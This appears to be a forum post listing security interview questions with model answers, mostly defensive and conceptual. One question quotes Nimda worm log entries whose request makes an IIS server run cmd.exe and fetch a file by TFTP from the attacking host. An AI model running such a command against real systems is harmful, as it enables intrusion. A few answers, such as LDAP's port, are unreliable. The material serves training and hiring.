<![CDATA[Latest posts for the topic "Security Interview Questions"]]> /hvaonline/posts/list/8.html JForum - http://www.jforum.net Security Interview Questions http://foo.com/logout/. A victim just loading that page could potentially get logged out from foo.com, and their browser would have made the action, not them (since browsers load all IMG tags automatically). How does one defend against CSRF? Logging out of sites and avoiding their “remember me” features can mitigate CSRF risk; not displaying external images or clicking links in “spam” or untrusted e-mails may also help. Requiring authentication in GET and POST parameters, not only cookies; Checking the HTTP Referer header; Ensuring there’s no crossdomain.xml file granting unintended access to Flash movies; and Limiting the lifetime of authentication cookies What kind of network (lab) do you have at home? I’ve yet to meet a serious security guy who doesn’t have a considerable home lab or network As a corporate Information Security professional, what’s more important to focus on: threats or vulnerabilities? Opinion-based, but the correct answer should be vulnerabilities as this what we can control in a corporate environment as we have little control over the threats. What’s the difference between a risk and vulnerability? If a CISSP gets this wrong, move along. Risk is dependent on a vulnerability where as a vulnerability is a weakness and risk is threat of an action or event. What is a Buffer Overflow? An anomaly where a process stores data in a buffer outside the memory the programmer set aside for it What is a NOP Sled? A sequence of NOP (no-operation) instructions (on x86 opcode 0×90) meant to “slide” the CPU’s instruction execution flow to its final, desired, destination. Someone wants to test out a new product that works on a wireless network, how would you advise them to test out the product? This will give the you a really good idea on how well wireless security is known by the candidate as well as how much they are willing to work with the business to test the new product. If they come up with a clean segregated network to test on that does not touch the main corporate network, or links to the internet in a DMZ type situation, that is promising. If they ask for a Faraday Cage, you might not have a winner here. A business team has developed this brand new web site that you just tested and found a number of XSS errors in, how would you handle that? This will let the interviewer know if the candidate has any idea about web security and development. If they offer to work with the developers to solve the issue you have a good candidate, if the candidate says it is the developer’s problem, and that they cannot help them or the business, then this might not be the candidate for you. Ask candidate to “Design a secure network”. This is meant to see how the candidate thinks, you can add something like design a secure network between two offices that is also optimized or has QoS for various protocols. Ask how they would they securely link two offices together? · Protocol stack · VPN solutions · You might want to include trusted partners. What is your Blog URL? If they have a blog then you need to know what they blog about, if they blog about tech that means they live, eat and breath this stuff, and that is good. If they are slamming on their co-workers, families, friends, or general how they pulled one over on someone, this might not be the person for you. What is your MySpace page? You have to ask this one for the same reason that you ask what their blog URL is, do they meet the needs of the company. I tend to dismiss the use of MySpace as something that I wouldn’t want to have or know someone that uses it, but that’s my opinion. What papers have you written? The answer to this is the same as the blog, if they don’t blog, and they don’t write then ask them what they are reading in the news, are they staying up on the technology, if not, you might not have a winner here. What is the secret sauce to a Cisco command? This will let you know if they have any hands on with a Cisco device at all, this can be important depending on what the security engineer will be doing. BTW the answer is TAB. What do you think of Teams? This is the ultimate people question; if they say they like teams, ask them why. If they say they like people, ask them why, what is it that drives their relationships with others. This opens up a whole line of questioning about how well they like people, how well they can train others, and their viewpoints on working with others. You really do want a social person or at least a person sociable enough for the company. What is the security threat level today at the Internet Storm Center (ISC)? You should know that it’s almost always Green Are they in touch with the current situation? Ask them what their favorite security web sites are. You should at least hear one you already read, if not check them out (write them down) and see what they are like, are they deep geek techno security, or are they fluff fox news kind of stuff. Hand them a security scan of a network and ask them to interpret it. This is always good to see if they know what they are looking at, and can derive information from it. Hand them a web site security scan and ask them to interpret it. This is always good to see if they know what they are looking at, and can derive information from it Show them a security policy from the company, and ask how they would enforce it. This is always good, you find out what kind of leader they are, do they intend on teaching and enforcement, or do they go right to punitive damages Show them a hack attack against something, down to the packet level, and ask what they would do. You have to hand them the entire attack, not just snippets of info. Find out what they know and can they interpret information well enough to be of use to the employer. What is their dream information security job? This is always good to find out how ambitious they are, where they see themselves in a while, and determine to see if there is a good fit between the job and the candidate. Ask them to explain SOX, HIPAA, PCI and GLB (if applicable). What do you see as the most critical and current threats effecting Internet accessible websites? Goal of question is to gauge the applicants knowledge of current web related threats. Topics such as Denial of Service, Brute Force, Buffer Overflows, and Input Validation are all relevant topics. Hopefully they will mention information provided by web security organizations such as the Web Application Security Consortium (WASC) or the Open Web Application Security Project (OWASP). What do you see as challenges to successfully deploying/monitoring web intrusion detection? You are attempting to see if the applicant has a wide knowledge of web security monitoring and IDS issues such as: · Limitations of NIDS for web monitoring (SSL, semantic issues with understanding HTTP) · Proper logging increasing the verboseness of logging (Mod_Security audit_log) · Remote Centralized Logging · Alerting Mechanisms · Updating Signatures/Policies What are the most important steps you would recommend for securing a new web server? There is no right or wrong answer. However, the following are good starting points: · Update/Patch the web server software · Minimize the server functionality disable extra modules · Delete default data/scripts · Increase logging verboseness · Update Permissions/Ownership of files What are the most important steps you would recommend for securing a new Web application? · Make sure Input Validation is enforced within the code – Security QA testing · Ensure application is configured to display generic error messages · Implement a software security policy · Remove or protect hidden files and directories Imagine that we are running an Apache reverse proxy server and one of the servers we are proxy for is a Windows IIS server. What does the log entry suggest has happened? What would you do in response to this entry? 68.48.142.117 – - [09/Mar/2004:22:22:57 -0500] “GET /c/winnt/system32/ cmd.exe?/c+dir HTTP/1.0″ 200 566 “-” “-” 68.48.142.117 – - [09/Mar/2004:22:23:48 -0500] “GET /c/winnt/system32/ cmd.exe?/c+tftp%20-%2068.48.142.117%20GET%20cool.dll%20c:\\httpodbc.dll HTTP/1.0″ 200 566 “-” “-” You will know if the applicant is fluent at reading web server log files in the Common Log Format (CLF). In this scenario, the client system (68.48.142.117) is infected with the Nimda worm. These requests will not affect our Apache proxy server since this is a Microsoft vulnerability. While it does not impact Apache, the logs do indicate that the initial request was successful (status code of 200). The Nimda worm will only send the level 2 request (trying to use Trivial FTP to infect the target) if the initial request is successful. Depending on the exact proxying rules in place, it would be a good idea to inspect the internal IIS server to verify that it has not been compromised. What is SSL? SSL is cryptographic protocols that provide security and data integrity for communications over networks such as the Internet. TLS and SSL encrypt the segments of network connections at the Transport Layer end-to-end. How do you create SSL certificates, generically speaking? To create a certificate, you generate a private key, generate a Certificate Signing Request, Generate and install the Certificate. What is DNS Hijacking? DNS hijacking is the practice of hijacking the resolution of DNS names to IP addresses by the use of rogue DNS servers, particularly for the practice of phishing What are IDA and/or Olly? Debuggers Have you hacked any system? This is a unique question in that for some companies the answer should always be “NO” as many companies has hire-no-hacker policy. If they start answering by indicating a legal or ethical engagement, then you might want to delve into this a little more. Have you released any worm/trojan/malicious code in the wild? Most definitely this answer should always be “NO.” If i give you two dlls of different versions, one has the vulnerability and another is patched for that vulnerability then how will you find the vulnerability? · Load them up in a debugger to determine which is which.· Validate the vulnerability by Googling, Microsoft, Secunia, etc. What is the latest security breach you’re aware of? · The goal is to gauge if the candidate is up on data breach disclosure. Can a Virtual Operating System be compromise? · The obvious answer is yes, so mix it up with a follow-up about the Host operating system being compromised from a guest. If they have no idea what a guest or host is then they don’t understand Virtualization security. What sort of test would you perform to understand a virus? · The idea here is to see if the candidate has an understanding of using a sandbox or external website for virus analysis. What is UPX? · The Ultimate Packer for eXecutables, is a free and open source executable packer supporting a number of file formats from different operating systems. What is meterpreter? · Meterpreter is a command line program that extends the functionality of Metasploit. What is LDAP? · LDAP (Lightweight Directory Access Protocol) is a protocol for communications between LDAP servers and LDAP clients. LDAP servers store “directories” which are access by LDAP clients. Why LDAP called Light weight? · LDAP is called lightweight because it is a smaller and easier protocol which was derived from the X.500 DAP (Directory Access Protocol) defined in the OSI network protocol stack. What are the standard port numbers for SMTP, POP3, IMAP4, RPC, LDAP and Global Catalog? · The standard port numbers are respectively SMTP 25,POP3 110, IMAP4 143,RPC 135, LDAP 636,GLOBAL CATALOG 3269 How will you determine if a file is packed or not? · There are numerous tools available to determine what packed a file: PEiD is a common tool that detects a large number of packers. · File Checksum Checking Services · Cumulative Anti Virus Testing: Virus Total , NoVirusThanks, Threat Expert, and Jotti Do you have Rainbow tables? This may or may not be of importance, but if you’re looking for a true pentester, the answer had better be yes. What is dsniff? This is a good question to determine what they know about network auditing and penetration testing tools. Have you ever used FTK, Encase, dc3dd, dd_rescue or dcfldd? This is used to determine if the candidate has any forensics experience. Other than Wireshark, what sniffers have you used? Here were looking for tcpdump, or something commercial. Tell me what you know about Sleuthkit. Sleuthkit is an open source disk analysis/forensics frontend for autopsy. With regard to forensics, what is physically different about how the platters are used in a 3.5” and a 2.5” HDD? The platters are written outside to inside on a 3.5” drive, where they inside (closest to the spindle) is written first on a 2.5” drive. What are DCO and HPA? DCO is Device Configuration Overlay and HPA is Host Protected Area. These are areas on a hard drive that are designed to store information in such a way that it cannot be easily modified changed or access by the user, BIOS or OS. Can DCO and HPA be changed? There is a tool called TAFT that can do this by talking directly to the ATA controller. There are numerous tools to remove HPA and DCO. Describe a time when you implemented defense in depth. The goal here is to get the candidate to talk about multiple layers of security, like an onion. What was the last course you attend? Where? When? Why? Has the candidate attended any training recently? Describe the last security implementation you were involved with. The goal here is to get the candidate to talk about their involvement with the implementation of a security product, imitative or design. Design a RADIUS infrastructure for 802.11 security and authentication. Goal of question here is to gauge the applicant’s knowledge of RADIUS. Do they use Realms? What was the last technical book you read? Goal of question here is to gauge the applicants desire to gain knowledge outside of work. What is your CISSP number? Check the status of the candidate’s certification. How would you decode the following packet in HEX? 4500 0036 308b 0000 4001 0000 7f00 0001 7f00 0001 0800 89f3 5a27 0200 3173 7432 444d 6d65 6765 7473 4153 7461 7262 7563 6b73 6361 7264 · Convert this from text to pcap using text2pcap, then open in Wireshark. What is a honeypot? A honeypot is a simply a system program or file that has absolutely no purpose in production. Therefore, we can always assume that if the honeypot is accessed, it is for some reason unrelated to your organization purpose. Are there limitations of Intrusion Detection Signatures? Signature based IDS provide a useful service to let an administrator know that he/she has been or is being attacked they should not be relied upon. It is far too easy to fool or shut down an IDS machine for them to be utilized as the primary line of defense against intruders. What was ISO 17799 originally called? BS 7799 What areas does ISO 27001 and 27002 cover? ISO 27001 covers the requirements for Information security management systems. ISO 27002 covers the actual practice for information security management Define an incident? This is really a question that is intended to illicit the amount of knowledge as well as the ability to think quickly. Candidates should say something similar to an event that could or actually does have an adverse effect on a company, department, or system. A good follow-up is to ask for an example of an incident that they were involved with and how they handled it. What is the difference between Encrypting and Encoding? In the simplest terms, it’s the lack of a key. What can protect you 100% from attack? If the candidate says any of the following you need to end the interview: Firewalls, AV, IDS/IPS, Encryption, policies. The point is there isn’t anything that can protect you 100% of the time.]]> /hvaonline/posts/list/38130.html#234168 /hvaonline/posts/list/38130.html#234168 GMT